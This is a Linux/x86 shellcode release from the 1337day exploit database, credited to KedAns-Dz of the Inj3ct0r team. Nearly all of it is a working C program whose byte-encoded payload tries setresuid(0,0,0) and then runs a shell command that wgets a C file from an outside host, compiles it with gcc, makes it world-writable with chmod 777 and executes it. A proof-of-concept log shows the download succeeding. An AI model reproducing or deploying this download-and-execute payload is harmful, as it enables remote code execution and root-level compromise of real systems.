/* 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KedAns-Dz member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ### # Title : Linux/x86 CMD[wget,mv,gcc,chmod] Download and exec() - sc_224 bytes # Author : KedAns-Dz # E-mail : ked-h (@hotmail.com / @1337day.com) # Home : Hassi.Messaoud (30500) - Algeria -(00213555248701) # Web Site : www.1337day.com # FaCeb0ok : http://fb.me/Inj3ct0rK3d # TwiTter : @kedans # Friendly Sites : www.r00tw0rm.com * www.exploit-id.com # Platform/CatID : Linux/x86 Shellcode # Type : shellcode - local/remote # Tested on : Ubuntu 10.10 ### # <3 <3 Greetings t0 Palestine <3 <3 # F-ck HaCking, Lov3 Explo8ting ! */ /* Shellcode dxx86-sck3d.c *///==========> #include <stdio.h> // Linux/x86 CMD[wget,mv,gcc,chmod] Download and exec() - sc_224 bytes char sc[] = // Setresuid(0,0,0) "\x31\xc9" // xor %ecx,%ecx "\x31\xdb" // xor %ebx,%ebx "\xf7\xe3" "\xb0\xa4" // mov %al,$0x0a4 "\xcd\x80" // int 0x80 "\x31\xc9" // xor %ecx,%ecx "\x31\xdb" // xor %ebx,%ebx "\x6a\x46" // push $0x46 "\x58" // pop %eax "\xcd\x80" // int 0x80 "\x31\xc9" // xor %ecx,%ecx "\x31\xdb" // xor %ebx,%ebx "\x6a\x46" // push $0x46 "\x58" // pop %eax "\xcd\x80" // int 0x80 "\x6a\x3d" // push $0x3d "\x89\xe3" // mov %ebx,%esp "\x6a\x27" // push $0x27 "\x58" // pop %eax "\xcd\x80" // int 0x80 "\x89\xd9" // mov %ecx,%ebx "\x58" // pop %eax "\xcd\x80" // int 0x80 "\x31\xc0" // xor %eax,%eax "\x50" // push %eax "\x66\x68\x2e\x2e" // push $0x2e2e "\x89\xe3" // mov %ebx,%esp "\x6a\x3d" // push $0x3d "\x59" // pop %ecx "\xb0\x0c" // mov %al,$0x0c "\xcd\x80" // int $0x80 "\xe2\xfa" // loopd "\x6a\x3d" // push $0x3d "\x89\xd9" // mov %ecx,%ebx "\x58" // pop %eax "\xcd\x80" // int 0x80 "\x6a\x0b" // push $0x0b "\x58" // pop %eax "\x99" // cdq "\x52" // push %edx "\x66\x68\x2d\x63" // push $0x632d "\x89\xe7" //mov %edi,%esp "\x68\x2f\x73\x68\x00" //push $0x68732f "\x68\x2f\x62\x69\x6e" //push $0x6e69622f "\x89\xe3" // mov %ebx,%esp "\x52" // push %edx // call_ [exev()] "\xe8\x72\x00\x00\x00" //---------------------- // WGET http://asylumspecimens.olympe.in/upload/k.c | file download "\x77\x67\x65\x74\x20\x68\x74\x74\x70" "\x3a\x2f\x2f\x61\x73\x79\x6c\x75\x6d\x73\x70\x65\x63\x69\x6d" "\x65\x6e\x73\x2e\x6f\x6c\x79\x6d\x70\x65\x2e\x69\x6e\x2f\x75" "\x70\x6c\x6f\x61\x64\x2f\x6b\x2e\x63\x3b" //---------------------- // Rename k.c to khaled.c "\x6d\x76\x20\x6b\x2e" "\x63\x20\x6b\x68\x61\x6c\x65\x64\x2e\x63\x3b" //---------------------- // gcc khaled.c -o kedans "\x67\x63\x63\x20" "\x6b\x68\x61\x6c\x65\x64\x2e\x63\x20\x2d\x6f\x20\x6b\x65\x64" "\x61\x6e\x73\x3b" //---------------------- // Chmod 777 kedans "\x63\x68\x6d\x6f\x64\x20\x37\x37\x37\x20\x6b" "\x65\x64\x61\x6e\x73\x3b" //---------------------- // Execv ./kedans "\x2e\x2f\x6b\x65\x64\x61\x6e\x73\x00" //---------------------- "\x57" // push %edi "\x53" // push %ebx "\x89\xe1" // mov %ecx,%esp "\xcd\x80" // int 0x80 "\x31\xdb" // xor %ebx,%ebx "\x6a\x01" // push $0x01 "\x58" // pop %eax "\xcd\x80"; // int 0x80 int main() { int (*dz)() = (int(*)())sc; printf("Size: %u Bytes\n", strlen(sc)); dz(); } // P.0.C Results /* kedans@1337day:~# ./dxx86-sck3d Size: 224 Bytes. --2013-03-17 00:57.53-- http://asylumspecimens.olympe.in/upload/k.c Resolving asylumspecimens.olympe.in (asylumspecimens.olympe.in)... 87.98.145.199, 91.121.61.12 Connecting to asylumspecimens.olympe.in (asylumspecimens.olympe.in)|87.98.145.199|:80... connected HTTP request sent, awaiting response... 200 OK Length: 146 [text/x-csrc] Saving to: 'k.c.1' 100%[====================================>] 146 --.-K/s in 0s 2013-03-17 00:57:53 (3.72 MB/s) - 'k.c.1' saved [146/146] Linux/x86 Download & Exec - with CHMOD and GCC Coded By KedAns-Dz | Inj3ct0r Team kedans@1337day:~# */ /* #================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=============================================== # Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Indoushka , Caddy-Dz , Kalashinkov3 , Mennouchi.Islem # Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Chevr0sky, Black-ID, Barbaros-DZ, # +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com) # Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection # NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all # Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD # packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * B.N.T * All Security and Exploits Webs #============================================================================================================*/